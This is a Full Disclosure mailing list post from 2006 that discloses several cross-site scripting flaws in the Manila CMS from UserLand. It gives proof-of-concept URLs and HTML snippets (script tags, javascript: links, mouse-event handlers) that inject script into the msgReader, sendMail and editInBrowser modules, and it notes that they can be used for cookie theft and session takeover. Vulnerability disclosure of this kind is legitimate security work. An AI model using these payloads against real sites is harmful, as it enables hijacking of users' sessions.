Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Manila.userland.com XSS'able
From: aaron <aaron () lo-res org>
Date: Sat, 15 Apr 2006 12:04:15 +0200




Manila from manila.userland.com is a widely deployed CMS       _     _
(http://http://manila.userland.com/selectedCustomers)          \`\ /`/
                                                                \ V /
This following cross site scripting exploit was sent to         /. .\
userland.com on the 2nd of April.                              =\ T /=
                                                                 / ^ \
Happy easter-hacking, live from the easterhegg                {}/\\ //\
(http://eh.cngw.org)                                          __\ " " /__
                                                         jgs (____/^\____)


--- snip -- original post to manila-bugs () userland com follows ----

Multiple XSS bugs in manila.
To: manila-bugs () userland com

Authors:
Michael Bauer <mihi () lo-res org>, Aaron Kaplan <aaron () lo-res org>

This bugs will be reported to you and released to the public 10  
days after
submission to userland.com, as we strongly believe in full disclosure.

Software:
   manila
Vendor:
   userland.com
Versions tested :
   <meta name="generator" content="UserLand Frontier 9.0.1">

Overview:

Manila is vulnerable to several XSS injections which can be abused
to steal a cookie from a logged in user. This means taking over his  
session
doing stuff in his name.


Details:

        In the module "msgReader"
        --------------------------
        proof of concept:
        http://manila.userland.com/discuss/msgReader$1?mode=%22%3E%3Cscript%3Ealert('XSS!')%3C/script%3E

        in the module "sendMail":
        --------------------------
        proof of concept:
        http://profiles.userland.com/sendMail?usernum=2500&referer=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

        in the module "editInBrowser"
        -----------------------------
        explanation:
        it is possible to use <a> and other html tags to put  
javascript
        instructions into the webpage examples:
        <a href=javascript:alert('xss!')>click here</a>
        <a href=# onmouseover="alert('xss!')">click here</a>
        <a href=# onmouseout="alert('xss!')">click here</a>

        demo can be seen on http://mana.manila.at/discuss/msgReader$15?mode=day
        as we got an account there.

Workaround:
htmlescape all user input! if you want to accept html as input
write your own html parser for a limited html subset.

Disclaimer:

For educational purposes only, we are not responsible to any harm  
produced
by the security hole we published.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Manila.userland.com XSS'able aaron (Apr 15)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault